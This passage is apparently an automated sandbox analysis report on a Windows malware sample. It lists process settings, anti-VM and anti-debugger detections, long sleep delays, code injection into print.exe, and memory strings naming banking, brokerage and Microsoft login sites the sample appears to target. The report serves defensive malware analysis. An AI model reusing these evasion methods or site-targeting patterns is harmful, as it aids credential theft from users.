                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: UnmxRI.exe PID: 6972, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: tehuvFgZlLZK.exe PID: 6844, type: MEMORYSTR
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Windows\SysWOW64\print.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                    Source: C:\Windows\SysWOW64\print.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                    Source: C:\Windows\SysWOW64\print.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                    Source: C:\Windows\SysWOW64\print.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                    Source: C:\Windows\SysWOW64\print.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                    Source: C:\Windows\SysWOW64\print.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                    Source: C:\Windows\SysWOW64\print.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA04
                    Source: C:\Windows\SysWOW64\print.exeAPI/Special instruction interceptor: Address: 7FF8C88ED744
                    Source: C:\Windows\SysWOW64\print.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                    Source: C:\Users\user\Desktop\UnmxRI.exeMemory allocated: 2300000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeMemory allocated: 24A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeMemory allocated: 44A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeMemory allocated: 7210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeMemory allocated: 8210000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeMemory allocated: 84C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeMemory allocated: 94C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeMemory allocated: B70000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeMemory allocated: 25D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeMemory allocated: 6FC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeMemory allocated: 7FC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeMemory allocated: 6FC0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E096E rdtsc 9_2_018E096E
                    Source: C:\Users\user\Desktop\UnmxRI.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4678Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4432Jump to behavior
                    Source: C:\Windows\SysWOW64\print.exeWindow / User API: threadDelayed 9672Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeAPI coverage: 1.3 %
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeAPI coverage: 0.3 %
                    Source: C:\Windows\SysWOW64\print.exeAPI coverage: 2.7 %
                    Source: C:\Users\user\Desktop\UnmxRI.exe TID: 5656Thread sleep time: -35529s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exe TID: 5588Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5900Thread sleep count: 4678 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6224Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6148Thread sleep count: 178 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3732Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5776Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5016Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe TID: 6332Thread sleep time: -35529s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe TID: 1576Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\print.exe TID: 7132Thread sleep count: 301 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\print.exe TID: 7132Thread sleep time: -602000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\print.exe TID: 7132Thread sleep count: 9672 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\print.exe TID: 7132Thread sleep time: -19344000s >= -30000sJump to behavior
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704Thread sleep time: -80000s >= -30000s
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704Thread sleep count: 31 > 30
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704Thread sleep time: -46500s >= -30000s
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704Thread sleep count: 40 > 30
                    Source: C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe TID: 2704Thread sleep time: -40000s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\print.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\print.exeLast function: Thread delayed
                    Source: C:\Windows\SysWOW64\print.exeCode function: 16_2_004BC0B0 FindFirstFileW,FindNextFileW,FindClose,16_2_004BC0B0
                    Source: C:\Users\user\Desktop\UnmxRI.exeThread delayed: delay time: 35529Jump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeThread delayed: delay time: 35529Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: y14291878.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: y14291878.16.drBinary or memory string: discord.comVMware20,11696428655f
                    Source: y14291878.16.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: y14291878.16.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: y14291878.16.drBinary or memory string: global block list test formVMware20,11696428655
                    Source: y14291878.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: y14291878.16.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: y14291878.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: y14291878.16.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: y14291878.16.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: y14291878.16.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: y14291878.16.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: y14291878.16.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: y14291878.16.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: y14291878.16.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: NUJqNHNKrrpXWLOEvky.exe, 00000012.00000002.4494943384.000000000111F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: y14291878.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: y14291878.16.drBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: y14291878.16.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: y14291878.16.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: y14291878.16.drBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: y14291878.16.drBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: y14291878.16.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: y14291878.16.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: y14291878.16.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: y14291878.16.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: y14291878.16.drBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: y14291878.16.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: y14291878.16.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: y14291878.16.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: y14291878.16.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: y14291878.16.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\SysWOW64\print.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E096E rdtsc 9_2_018E096E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_00417583 LdrLoadDll,9_2_00417583
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018E0185 mov eax, dword ptr fs:[00000030h]9_2_018E0185
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192019F mov eax, dword ptr fs:[00000030h]9_2_0192019F
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192019F mov eax, dword ptr fs:[00000030h]9_2_0192019F
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192019F mov eax, dword ptr fs:[00000030h]9_2_0192019F
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0192019F mov eax, dword ptr fs:[00000030h]9_2_0192019F
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01944180 mov eax, dword ptr fs:[00000030h]9_2_01944180
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01944180 mov eax, dword ptr fs:[00000030h]9_2_01944180
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0195C188 mov eax, dword ptr fs:[00000030h]9_2_0195C188
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0195C188 mov eax, dword ptr fs:[00000030h]9_2_0195C188
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189A197 mov eax, dword ptr fs:[00000030h]9_2_0189A197
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189A197 mov eax, dword ptr fs:[00000030h]9_2_0189A197
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189A197 mov eax, dword ptr fs:[00000030h]9_2_0189A197
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E1D0 mov eax, dword ptr fs:[00000030h]9_2_0191E1D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E1D0 mov eax, dword ptr fs:[00000030h]9_2_0191E1D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E1D0 mov ecx, dword ptr fs:[00000030h]9_2_0191E1D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E1D0 mov eax, dword ptr fs:[00000030h]9_2_0191E1D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0191E1D0 mov eax, dword ptr fs:[00000030h]9_2_0191E1D0
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019661C3 mov eax, dword ptr fs:[00000030h]9_2_019661C3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019661C3 mov eax, dword ptr fs:[00000030h]9_2_019661C3
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_019761E5 mov eax, dword ptr fs:[00000030h]9_2_019761E5
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D01F8 mov eax, dword ptr fs:[00000030h]9_2_018D01F8
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01960115 mov eax, dword ptr fs:[00000030h]9_2_01960115
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194A118 mov ecx, dword ptr fs:[00000030h]9_2_0194A118
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194A118 mov eax, dword ptr fs:[00000030h]9_2_0194A118
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194A118 mov eax, dword ptr fs:[00000030h]9_2_0194A118
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194A118 mov eax, dword ptr fs:[00000030h]9_2_0194A118
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E10E mov eax, dword ptr fs:[00000030h]9_2_0194E10E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E10E mov ecx, dword ptr fs:[00000030h]9_2_0194E10E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E10E mov eax, dword ptr fs:[00000030h]9_2_0194E10E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E10E mov eax, dword ptr fs:[00000030h]9_2_0194E10E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E10E mov ecx, dword ptr fs:[00000030h]9_2_0194E10E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E10E mov eax, dword ptr fs:[00000030h]9_2_0194E10E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E10E mov eax, dword ptr fs:[00000030h]9_2_0194E10E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E10E mov ecx, dword ptr fs:[00000030h]9_2_0194E10E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E10E mov eax, dword ptr fs:[00000030h]9_2_0194E10E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0194E10E mov ecx, dword ptr fs:[00000030h]9_2_0194E10E
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018D0124 mov eax, dword ptr fs:[00000030h]9_2_018D0124
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01938158 mov eax, dword ptr fs:[00000030h]9_2_01938158
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01934144 mov eax, dword ptr fs:[00000030h]9_2_01934144
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01934144 mov eax, dword ptr fs:[00000030h]9_2_01934144
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01934144 mov ecx, dword ptr fs:[00000030h]9_2_01934144
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01934144 mov eax, dword ptr fs:[00000030h]9_2_01934144
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01934144 mov eax, dword ptr fs:[00000030h]9_2_01934144
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A6154 mov eax, dword ptr fs:[00000030h]9_2_018A6154
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A6154 mov eax, dword ptr fs:[00000030h]9_2_018A6154
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_0189C156 mov eax, dword ptr fs:[00000030h]9_2_0189C156
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974164 mov eax, dword ptr fs:[00000030h]9_2_01974164
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_01974164 mov eax, dword ptr fs:[00000030h]9_2_01974164
                    Source: C:\Users\user\Desktop\UnmxRI.exeCode function: 9_2_018A208A mov eax, dword ptr fs:[00000030h]9_2_018A208A
